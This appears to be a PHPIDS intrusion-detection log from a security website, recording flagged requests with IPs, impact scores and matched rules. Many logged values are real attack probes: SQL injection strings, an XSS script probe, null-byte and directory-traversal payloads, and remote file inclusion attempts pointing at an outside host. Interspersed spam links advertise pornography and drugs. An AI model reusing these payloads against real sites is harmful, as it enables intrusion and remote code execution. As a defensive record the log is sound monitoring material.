Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122639
Name:REQUEST.page
Value:http://www.reiluke.site90.com/index.php?security/hackingillustrated
Page:/i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated
IP:83.90.130.169
Impact:10
Created:2010-04-27 07:12:19
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122640
Name:GET.page
Value:http://www.reiluke.site90.com/index.php?security/hackingillustrated
Page:/i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated
IP:83.90.130.169
Impact:10
Created:2010-04-27 07:12:19
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122637
Name:REQUEST.page
Value:suckmydick.phpsecurity/hackingillustrated
Page:/i.php?page=suckmydick.php%00security/hackingillustrated
IP:83.90.130.169
Impact:10
Created:2010-04-27 07:12:18
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122638
Name:GET.page
Value:suckmydick.phpsecurity/hackingillustrated
Page:/i.php?page=suckmydick.php%00security/hackingillustrated
IP:83.90.130.169
Impact:10
Created:2010-04-27 07:12:18
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122635
Name:REQUEST.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-04-27 07:07:38
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122636
Name:GET.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-04-27 07:07:38
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122633
Name:REQUEST.codeme
Value:I have the same., <a href= http://technorati.com/people/latinaass#1 >Real latina ass</a> [url=http://technorati.com/people/latinaass#1]Real latina ass[/url], udoi,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-27 06:13:30
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122634
Name:POST.codeme
Value:I have the same., <a href= http://technorati.com/people/latinaass#1 >Real latina ass</a> [url=http://technorati.com/people/latinaass#1]Real latina ass[/url], udoi,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-27 06:13:30
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122631
Name:REQUEST.codeme
Value:<script>alert("smiedzisz octem")</script>
Page:/xss-sql-injection-fuzzing-barcode-generator.php?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+IrongeeksSecuritySite+%28Irongeek%27s+Security+Site%29
IP:195.8.99.234
Impact:52
Created:2010-04-27 05:39:10
Details:
Impact: 26 | Tags: xss, csrf, id, rfe, lfi, sqli
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: Detects possible includes and typical script methods | Tags: xss, csrf, id, rfe | ID: 16
Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43

ID:122632
Name:POST.codeme
Value:<script>alert("smiedzisz octem")</script>
Page:/xss-sql-injection-fuzzing-barcode-generator.php?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+IrongeeksSecuritySite+%28Irongeek%27s+Security+Site%29
IP:195.8.99.234
Impact:52
Created:2010-04-27 05:39:10
Details:
Impact: 26 | Tags: xss, csrf, id, rfe, lfi, sqli
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: Detects possible includes and typical script methods | Tags: xss, csrf, id, rfe | ID: 16
Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43

ID:122629
Name:REQUEST.page
Value:security/keylogger\"
Page:/i.php?page=security/keylogger%5C%22
IP:91.204.228.150
Impact:12
Created:2010-04-27 05:32:39
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122630
Name:GET.page
Value:security/keylogger\"
Page:/i.php?page=security/keylogger%5C%22
IP:91.204.228.150
Impact:12
Created:2010-04-27 05:32:39
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122627
Name:REQUEST.codeme
Value:Great site. Keep doing., <a href= http://technorati.com/people/duckyporn >ducky porn</a>, [url= http://technorati.com/people/duckyporn ]ducky porn[/url], %-(((,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:30
Created:2010-04-27 05:23:56
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++::

ID:122628
Name:POST.codeme
Value:Great site. Keep doing., <a href= http://technorati.com/people/duckyporn >ducky porn</a>, [url= http://technorati.com/people/duckyporn ]ducky porn[/url], %-(((,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:30
Created:2010-04-27 05:23:56
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++::

ID:122625
Name:REQUEST.page
Value:backtrack-3 and 0=1 union select -man/truecrypt
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/truecrypt
IP:113.22.19.233
Impact:20
Created:2010-04-27 03:32:30
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122626
Name:GET.page
Value:backtrack-3 and 0=1 union select -man/truecrypt
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/truecrypt
IP:113.22.19.233
Impact:20
Created:2010-04-27 03:32:30
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122623
Name:REQUEST.codeme
Value:Nice, <a href= http://technorati.com/people/familyguyporn >family guy porn here</a>, [url= http://technorati.com/people/familyguyporn ]family guy porn here[/url], 4005,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-27 02:56:30
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122624
Name:POST.codeme
Value:Nice, <a href= http://technorati.com/people/familyguyporn >family guy porn here</a>, [url= http://technorati.com/people/familyguyporn ]family guy porn here[/url], 4005,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-27 02:56:30
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122621
Name:REQUEST.page
Value:backtrack-3 and 0=1 union select -man/truecrypt
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/truecrypt
IP:113.22.19.233
Impact:20
Created:2010-04-27 02:55:48
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122622
Name:GET.page
Value:backtrack-3 and 0=1 union select -man/truecrypt
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/truecrypt
IP:113.22.19.233
Impact:20
Created:2010-04-27 02:55:48
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122619
Name:REQUEST.page
Value:backtrack-3 and 0=1 union select -man/truecrypt
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/truecrypt
IP:113.22.19.233
Impact:20
Created:2010-04-27 02:51:42
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122620
Name:GET.page
Value:backtrack-3 and 0=1 union select -man/truecrypt
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/truecrypt
IP:113.22.19.233
Impact:20
Created:2010-04-27 02:51:42
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122617
Name:REQUEST.page
Value:backtrack-3 and 0=1 union select -man/truecrypt
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/truecrypt
IP:123.19.97.61
Impact:20
Created:2010-04-27 02:24:33
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122618
Name:GET.page
Value:backtrack-3 and 0=1 union select -man/truecrypt
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/truecrypt
IP:123.19.97.61
Impact:20
Created:2010-04-27 02:24:33
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122615
Name:REQUEST.page
Value:security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker
Page:/i.php?page=security/thumbscrew-software-%3Cspan%20style='background-color:yellow'%3Eusb%3C/span%3E-write-blocker
IP:66.249.67.227
Impact:42
Created:2010-04-27 02:16:54
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122616
Name:GET.page
Value:security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker
Page:/i.php?page=security/thumbscrew-software-%3Cspan%20style='background-color:yellow'%3Eusb%3C/span%3E-write-blocker
IP:66.249.67.227
Impact:42
Created:2010-04-27 02:16:54
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122611
Name:REQUEST.amp;mode
Value:print//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://phamsight.com/docs/images/head???
Page:/i.php?page=security/ettercapfilter&amp;mode=print//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://phamsight.com/docs/images/head???
IP:66.244.236.248
Impact:28
Created:2010-04-27 00:55:52
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122612
Name:REQUEST.page
Value:security//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://phamsight.com/docs/images/head???
Page:/i.php?page=security//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://phamsight.com/docs/images/head???
IP:66.244.236.248
Impact:28
Created:2010-04-27 00:55:52
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122613
Name:GET.amp;mode
Value:print//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://phamsight.com/docs/images/head???
Page:/i.php?page=security/ettercapfilter&amp;mode=print//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://phamsight.com/docs/images/head???
IP:66.244.236.248
Impact:28
Created:2010-04-27 00:55:52
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122614
Name:GET.page
Value:security//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://phamsight.com/docs/images/head???
Page:/i.php?page=security//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://phamsight.com/docs/images/head???
IP:66.244.236.248
Impact:28
Created:2010-04-27 00:55:52
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122607
Name:REQUEST.amp;mode
Value:print//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://phamsight.com/docs/images/head???
Page:/i.php?page=security/ettercapfilter&amp;mode=print//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://phamsight.com/docs/images/head???
IP:66.244.236.248
Impact:28
Created:2010-04-27 00:48:11
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122608
Name:GET.amp;mode
Value:print//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://phamsight.com/docs/images/head???
Page:/i.php?page=security/ettercapfilter&amp;mode=print//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://phamsight.com/docs/images/head???
IP:66.244.236.248
Impact:28
Created:2010-04-27 00:48:11
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122609
Name:REQUEST.page
Value:security//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://phamsight.com/docs/images/head???
Page:/i.php?page=security//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://phamsight.com/docs/images/head???
IP:66.244.236.248
Impact:28
Created:2010-04-27 00:48:11
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122610
Name:GET.page
Value:security//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://phamsight.com/docs/images/head???
Page:/i.php?page=security//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://phamsight.com/docs/images/head???
IP:66.244.236.248
Impact:28
Created:2010-04-27 00:48:11
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122603
Name:REQUEST.page
Value:security/*.php?page=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/*.php?page=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:26
Created:2010-04-27 00:45:22
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122604
Name:GET.page
Value:security/*.php?page=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/*.php?page=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:26
Created:2010-04-27 00:45:22
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122605
Name:REQUEST.page
Value:security/mutillidae-deliberately-vulnerable-php-owasp-top-10/*.php?page=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10/*.php?page=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:26
Created:2010-04-27 00:45:22
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122606
Name:GET.page
Value:security/mutillidae-deliberately-vulnerable-php-owasp-top-10/*.php?page=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10/*.php?page=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:26
Created:2010-04-27 00:45:22
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122599
Name:REQUEST.page
Value:security/*.php?page=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/*.php?page=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:26
Created:2010-04-27 00:44:52
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122600
Name:REQUEST.page
Value:security/mutillidae-deliberate …/*.php?page=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/mutillidae-deliberate%20%E2%80%A6/*.php?page=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:26
Created:2010-04-27 00:44:52
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122601
Name:GET.page
Value:security/mutillidae-deliberate …/*.php?page=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/mutillidae-deliberate%20%E2%80%A6/*.php?page=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:26
Created:2010-04-27 00:44:52
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122602
Name:GET.page
Value:security/*.php?page=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/*.php?page=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:26
Created:2010-04-27 00:44:52
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122597
Name:REQUEST.codeme
Value:I bookmarked this guestbook., <a href= http://technorati.com/people/sexonthebeach#1 >sex on the beach discount</a> [url=http://technorati.com/people/sexonthebeach#1]sex on the beach discount[/url], 8-((,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-27 00:29:39
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((+::

ID:122598
Name:POST.codeme
Value:I bookmarked this guestbook., <a href= http://technorati.com/people/sexonthebeach#1 >sex on the beach discount</a> [url=http://technorati.com/people/sexonthebeach#1]sex on the beach discount[/url], 8-((,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-27 00:29:39
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((+::

ID:122595
Name:REQUEST.amp;mode
Value:print//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://phamsight.com/docs/images/head???
Page:/i.php?page=security/ettercapfilter&amp;mode=print//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://phamsight.com/docs/images/head???
IP:66.244.236.248
Impact:28
Created:2010-04-27 00:27:26
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122596
Name:GET.amp;mode
Value:print//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://phamsight.com/docs/images/head???
Page:/i.php?page=security/ettercapfilter&amp;mode=print//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://phamsight.com/docs/images/head???
IP:66.244.236.248
Impact:28
Created:2010-04-27 00:27:26
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122593
Name:REQUEST.page
Value:security//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://phamsight.com/docs/images/head???
Page:/i.php?page=security//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://phamsight.com/docs/images/head???
IP:66.244.236.248
Impact:28
Created:2010-04-27 00:27:25
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122594
Name:GET.page
Value:security//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://phamsight.com/docs/images/head???
Page:/i.php?page=security//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://phamsight.com/docs/images/head???
IP:66.244.236.248
Impact:28
Created:2010-04-27 00:27:25
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122592
Name:GET.page
Value:"><HR>
Page:/i.php?page=%22%3E%3CHR%3E
IP:67.195.111.36
Impact:8
Created:2010-04-27 00:18:01
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1

ID:122591
Name:REQUEST.page
Value:"><HR>
Page:/i.php?page=%22%3E%3CHR%3E
IP:67.195.111.36
Impact:8
Created:2010-04-27 00:18:00
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1

ID:122589
Name:REQUEST.page
Value:backtrack-3 and 0=1 union select -man/truecrypt
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/truecrypt
IP:115.75.18.168
Impact:20
Created:2010-04-27 00:00:54
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122590
Name:GET.page
Value:backtrack-3 and 0=1 union select -man/truecrypt
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/truecrypt
IP:115.75.18.168
Impact:20
Created:2010-04-27 00:00:54
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122587
Name:REQUEST.codeme
Value:I bookmarked this guestbook., <a href= http://technorati.com/people/dickssportinggoods >dicks sporting goods online</a>, [url= http://technorati.com/people/dickssportinggoods ]dicks sporting goods online[/url], 828,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-26 23:40:30
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122588
Name:POST.codeme
Value:I bookmarked this guestbook., <a href= http://technorati.com/people/dickssportinggoods >dicks sporting goods online</a>, [url= http://technorati.com/people/dickssportinggoods ]dicks sporting goods online[/url], 828,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-26 23:40:30
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122585
Name:REQUEST.codeme
Value:Perfect work, <a href= http://technorati.com/people/howlongdoesxanaxstayinyoursyst#1 >how long does xanax stay in your system discount</a> [url=http://technorati.com/people/howlongdoesxanaxstayinyoursyst#1]how long does xanax stay in your system discount[/url], uwa,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-26 22:51:16
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122586
Name:POST.codeme
Value:Perfect work, <a href= http://technorati.com/people/howlongdoesxanaxstayinyoursyst#1 >how long does xanax stay in your system discount</a> [url=http://technorati.com/people/howlongdoesxanaxstayinyoursyst#1]how long does xanax stay in your system discount[/url], uwa,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-26 22:51:16
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122583
Name:REQUEST.codeme
Value:can you do thi for me, <a href= http://technorati.com/people/whatisthedifferencebetweenadip >what is the difference between adipex and phentermine free</a>, [url= http://technorati.com/people/whatisthedifferencebetweenadip ]what is the difference between adipex and phentermine free[/url], :[,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-26 22:01:42
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122584
Name:POST.codeme
Value:can you do thi for me, <a href= http://technorati.com/people/whatisthedifferencebetweenadip >what is the difference between adipex and phentermine free</a>, [url= http://technorati.com/people/whatisthedifferencebetweenadip ]what is the difference between adipex and phentermine free[/url], :[,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-26 22:01:42
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122581
Name:REQUEST.task
Value:../../../../../../../../../../../../../../../../tmp/xem076d24c.txt
Page:////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../tmp/xem076d24c.txt%00
IP:69.175.12.234
Impact:30
Created:2010-04-26 21:47:01
Details:
Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122582
Name:GET.task
Value:../../../../../../../../../../../../../../../../tmp/xem076d24c.txt
Page:////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../tmp/xem076d24c.txt%00
IP:69.175.12.234
Impact:30
Created:2010-04-26 21:47:01
Details:
Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10
